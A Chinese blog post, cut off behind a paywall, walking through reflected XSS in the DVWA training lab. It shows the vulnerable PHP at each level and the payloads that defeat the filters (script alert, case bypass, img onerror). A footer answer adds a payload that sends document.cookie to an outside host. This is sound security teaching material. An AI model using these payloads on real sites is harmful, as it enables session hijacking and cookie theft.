DVWA靶场XSS三种类型漏洞练习

最新推荐文章于 2025-02-28 16:02:43 发布
最新推荐文章于 2025-02-28 16:02:43 发布
阅读量2.2k 收藏 17
点赞数 3
文章标签: xss 安全漏洞 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c_programj/article/details/116798637
版权
本文详细介绍了DVWA靶场中的反射型、存储型和DOM型XSS漏洞,涵盖从低到高四个安全等级的实战练习,包括payload的构造与绕过策略,并总结了常见的XSS防护函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DVWA靶场XSS三种漏洞练习

反射型XSS(非持久性)

反射型

【low】

后台码源:

<?php
    header ("X-XSS-Protection: 0");
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Feedback for end user
       echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    }
?>

观察到程序并没有对用户输入的name进行任何的过滤操作,那么我们直接输入<script>alert('XSS')</script>即可观察到弹窗,从而验证XSS漏洞的存在。
在这里插入图片描述

可尝试其他操作,直接获取Cookie值,输入<script>alert(document.cookie)</script> ,结果如下:
在这里插入图片描述

【Medium】

将系统的安全等级调为Medium,然后输入刚才的payload:<script>alert('XSS')</script> ,发现已经无法正常发生弹窗了:
在这里插入图片描述

后台源码:

<?php
    header ("X-XSS-Protection: 0");
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Get input
       $name = str_replace( '<script>', '', $_GET[ 'name' ] );
       // Feedback for end user
      echo "<pre>Hello ${name}</pre>";
   }
?>

在将获取到的name值的时候,str_replace()函数将name值中的<script>标签转化为空。然后再将name值的结果输出,所以当我们再次使用low级别的payload的时候我们的<script>标签被过滤掉。但是这个函数区分大小写。所以当我们使用low级别中的payload大写的时候,一样可以绕过它的过滤。我们试一下:Payload:<SCRIPT>alert('XSS')</SCRIPT>
在这里插入图片描述

【High】

后台码源:

<?php
   header ("X-XSS-Protection: 0");
   // Is there any input?
   if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
       // Feedback for end user
       echo "<pre>Hello ${name}</pre>";
   }
?>

观察到使用了正则表达式来过滤。preg_replace()函数,将包含<script的字符,不管大小写,不管后面跟着1个或多个与之相同的字符都转换为空。那么我们就不能使用大小写绕过和重写的方法来绕过了。
虽然无法使用<script>标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。这样就会避免出现<script>标签被正则表达式匹配到。
我们可以使用以下Payload:

<img src=1 onerror=alert(1)>

在这里插入图片描述标签是添加一张图片。src,指定图片的url,onerror是指定加载图片时如果出现错误则要执行的事件。这里我们的图片url肯定是错误的,这个弹窗事件也必会执行。
在这里插入图片描述

【Impossible】

后台码源:

<?php
   // Is there any input?
   if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
   
       // Check Anti-CSRF token
       checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
       // Get input
       $name = htmlspecialchars( $_GET[ 'name' ] );
       // Feedback for end user
       echo "<pre>Hello ${name}</pre>";
   }
   // Generate Anti-CSRF token
   generateSessionToken();
?>

这个很难做到弹框。里面处理$_GET[‘name’]的值得时候利用了函数htmlspecialchars(),将值里面的预定义函数,都变成html实体。
(在php中,htmlspecialchars()函数是使用来把一些预定义的字符转换为HTML实体,返回转换后的新字符串,原字符串不变。)

被转换的预定义的字符有:
&:转换为&amp;
":转换为&quot;
':转换为成为 '
<:转换为&lt
>:转换为&gt;

存储型XSS(持久性)

【Low】

后台码源:

<?php
  if( isset( $_POST[ 'btnSign' ] ) ) {
   
    // Get input
    $message = trim(
最低0.47元/天 解锁文章
c_programj
关注
DVWA XSS漏洞复现
ch258563的博客
04-02 409
DVWA XSS漏洞复现
DVWA测试XSS跨站脚本攻击三种类型
WINDY_PACE的博客
05-04 1900
测试XSS三种类型危害最大的存储型如何无声息钓鱼获取到用户信息
XSSDVWA靶场XSS攻击
最新发布
weixin_40433003的博客
02-28 1396
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web安全漏洞,它允许攻击者在受害者的浏览器中执行恶意脚本。攻击者通常通过在Web应用程序中注入恶意脚本代码(如JavaScript),并在用户访问该页面时执行这些代码。
DVWA靶场XSSSQL注入实战
bwxzdjn的博客
03-25 1074
XSSSQL注入学习后的实操,主要是借助DVWA靶场,通过对不同分类和过滤的实战,进一步掌握不同分类的XSSSQL注入攻击方法。(不包含不可能章节)
DVWAXSS基础练习
weixin_44897902的博客
07-10 336
攻防世界: weak auth: 抓包分析,提示要使用字典爆破,并且要是admin 那就使用bp爆破: 可以看见23456时,相应包长度明显不一样,所以密码为123456 登录即flag Dvwa: 储存型xssLow: Trim():去除字符串两侧的空白 mysqli_real_escape_string(string,connection) 对字符串中的特殊符号(\x00,\n,\r...
【无标题】DVWA靶场xss漏洞
weixin_46954909的博客
05-17 1231
alert(1)
挖掘 XSS 漏洞练习
weixin_51494407的博客
11-20 71
查看源代码,测试内容没有被过滤转义,存在 XSS。输入的内容原样返回,则存在 xss 漏洞。被转义为实体编码,XSS 漏洞不可用。被转义为实体编码,XSS 漏洞不可用。使用其他方式验证内容原样返回。将难度调为完全防御模式。
皮卡丘(pikachu)靶场XSS漏洞练习
criminal_1的博客
02-06 582
皮卡丘(pikachu)靶场XSS漏洞练习
dvwa靶场xss
m0_63314341的博客
02-26 319
dom类型 我们先说一下low级别 low级别没有做任何防御所以我们修改url为 <​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=Englishscript%3Ealert(/xss/)%3C/script%3Ej 即可
DVWA靶场,集成了owasp top 10漏洞
03-28
通过DVWA靶场的学习,你可以深入了解这些漏洞,提升自己的渗透测试技能,并了解如何为实际环境中的Web应用程序构建更强大的安全防护。同时,对于开发人员来说,这是一个绝佳的平台,可以用来增强对安全编码的理解,...
DVWA网络安全靶场搭建与练习 附攻略和在线版
01-02
这个靶场包含了SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等多种常见Web安全威胁,涵盖了基础到高级的各类漏洞类型。 首先,我们来了解一下如何搭建DVWA。一般来说,你需要一个运行Apache服务器、PHP和...
xss平台搭建源码,xss漏洞练习
06-03
xss平台搭建源码,用于练习xss漏洞,适用于网络安全学科的爱好者和学生,下载后解压缩到www目录下,需要将xss-sql导入数据库,并更改一下源码部分内容,很容易。最后要配置伪静态文件。
DVWA靶场搭建教程,网站搭建
09-06
DVWA靶场搭建教程,网站搭建】 DVWA(Damn Vulnerable Web Application)是一个非常流行的在线安全学习平台,用于教育和测试网络安全技能。这个靶场包含了一系列不同级别的漏洞,如SQL注入XSS攻击、文件包含等...
XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWAXSS-labs等)
m0_64378913的博客
05-13 2635
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
DVWA靶场 XSS
Lee_yc的博客
09-13 1911
1、正常注入是肯定不行了,直接查看源代码,发现只能从name字段注入,而且不能使用标签,这时就想着使用 等标签。5、也可以使用双写script标签的方法,绕过限制 alert("xss success!")") 双写标签绕过。3、大写标签进行绕过,alert("xss success!
pikachu靶场下的xss漏洞练习
记录学习,一起进步
12-07 749
pikachu靶场进行xss漏洞练习及分析
XSS漏洞实验
goldfish8848的博客
06-23 1838
本篇为xss漏洞实验练习练习网址来源于网络。
XSS漏洞(综合练习)——渗透day09
qq_62716256的博客
09-06 756
XSS漏洞(综合练习)——day09x
DVWA靶场XSS(DOM/Reflected/Stored)/XSS+CSRF
m0_51150495的博客
06-15 2209
xss(dom/reflected/stored) xss+csrf
dvwa靶场xss通关
08-15
DVWA(Damn Vulnerable Web Application)是一个用于测试和练习Web应用程序安全漏洞靶场XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,使得网站在用户端执行这些脚本,从而获取用户敏感信息或进行其他攻击行为。 为了在DVWA靶场中完成XSS通关,你可以尝试以下步骤: 1. 注入脚本:在输入框或者参数中注入恶意脚本代码,比如上面提到的payload,如<img src=x οnerrοr=document.write('<img src="http://ip:8899/' document.cookie '"/>')>。 2. 触发脚本执行:提交注入的脚本,使得网站后端将其返回到前端,并在用户端执行。 3. 获取结果:当脚本执行时,它会将用户的Cookie数据发送到指定的服务器上(http://ip:8899/)。 请注意,这是一种漏洞攻击示例,请在授权范围内使用,并遵循道德规范。在实际应用中,网站开发人员应该采取相应的安全措施来防止XSS攻击,例如输入验证、输出编码等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA通关--反射型XSSXSS (Reflected))](https://blog.csdn.net/elephantxiang/article/details/111146085)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWA靶场xss通关笔记,详解带截图](https://blog.csdn.net/AboutLzs/article/details/123631604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值